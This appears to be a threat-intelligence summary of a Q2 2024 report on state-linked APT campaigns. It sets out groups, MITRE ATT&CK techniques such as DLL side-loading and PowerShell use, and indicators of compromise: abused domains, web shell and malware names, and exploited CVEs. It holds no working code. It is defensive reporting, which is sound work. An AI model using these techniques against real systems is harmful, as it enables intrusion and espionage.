The Q2 2024 report flags intensified APT activity across Iran, Russia, China, and North Korea, with campaigns targeting governments, critical infrastructure, and global sectors. It highlights new tools, backdoors, and evasion techniques (e.g., web shells, DLL side-loading, and sophisticated social engineering), underscoring the need for ongoing vigilance and software updates. Hashtags: #VoidManticore #MuddyWater #Kimsuky #LazarusGroup #Nestdoor #TRANSLATEXT
Keypoints
- Surge in APT activity in Q2 2024 from Iran, Russia, China, and North Korea with cross-region targeting of government, finance, energy, and critical infrastructure sectors.
- Iranian operations featured destructive wipers and data theft (Void Manticore) and Middle East-focused intrusions (MuddyWater) using spear-phishing and remote access tools.
- Russian actors showcased espionage and credential-theft campaigns (APT28/Forest Blizzard, Sandworm) with CVE chaining and DLL manipulation; FIN7 expanded to defense and transportation sectors.
- Chinese actors escalated cyber-espionage with RedJuliett’s edge-device exploitation and APT41’s multi-platform backdoors (KEYPLUG) and evasion (UNAPIMON) across Windows and Linux.
- North Korean groups (Kimsuky, Moonstone Sleet, Lazarus, Andariel) deployed new backdoors (Gomir, Kaolin RAT), fake companies, social engineering, and supply-chain-style infection vectors (Trojanized installers, fake job lures).
- Emerging adversary behaviors include DLL side-loading, credential dumping, browser credential theft, virtualization/sandbox evasion, and application-layer C2 across diverse environments.
- Emphasis on resilience through user education, timely patching (e.g., CVE-2022-38028, CVE-2017-11882), and continuous monitoring to counter evolving APT capabilities.
MITRE Techniques
- [T1566.002] Phishing: Spearphishing Link – The report notes targeted social engineering and impersonation to gain access. Quote: “phishing emails from various legitimate domains controlled by the attacker.”
- [T1190] Exploit Public-Facing Application – RedJuliett leveraged vulnerabilities in network edge devices for initial access. Quote: “exploited known vulnerabilities in network edge devices, such as firewalls, VPNs, and load balancers for initial access.”
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Lazarus Kaolin RAT side-loads DLLs (e.g., version.dll) to run payloads. Quote: “side-loads ‘version.dll’ … and injects a payload from ‘aws.cfg’.”
- [T1059.001] Command and Scripting Interpreter: PowerShell – Kimsuky and associated campaigns used PowerShell scripts. Quote: “Kimsuky’s tactics included using PowerShell scripts and manipulating the Windows registry to enforce extension installation.”
- [T1071] Application Layer Protocol – Adversaries used standard web protocols for C2 channels. Quote: “Application Layer Protocol: Web Protocols.”
- [T1082] System Information Discovery – Several campaigns collect host data to map environments. Quote: “System Information Discovery.”
- [T1112] Modify Registry – Russian/Other campaigns modified registry keys to persist and execute. Quote: “Modify Registry.”
Indicators of Compromise
- [Domain] run.mocky.io, webhook.site – IOC context: used as malicious hosting points in spearphishing campaigns and payload delivery (e.g., APT28 campaign).
- [File name] Karma Shell, reGeorge, BiBi – IOC context: custom web wiper and web shells used by Void Manticore for persistence and payload deployment.
- [Process] mshta.exe – IOC context: used by Kimsuky to execute malicious scripts via mshta.exe delivery chains.
- [Process] vmtoolsd.exe – IOC context: hijacked legitimate process to run a reconnaissance batch file (Earth Freybug chain).
- [File] AmazonVNC.exe and version.dll – IOC context: fake/renamed Windows app that side-loads a DLL to deliver Kaolin RAT (Lazarus).
- [Malware] ReconShark, Gomir, TRANSLATEXT, Kaolin RAT, Nestdoor, Dora RAT – IOC context: components used across campaigns for data theft, persistence, and C2.
- [CVE] CVE-2022-38028, CVE-2017-11882, CVE-2019-0604, CVE-2024-21338 – IOC context: vulnerabilities exploited by multiple groups to gain initial access or escalate privileges.
Read more: https://www.cyfirma.com/research/apt-quarterlyhighlights-q2-2024/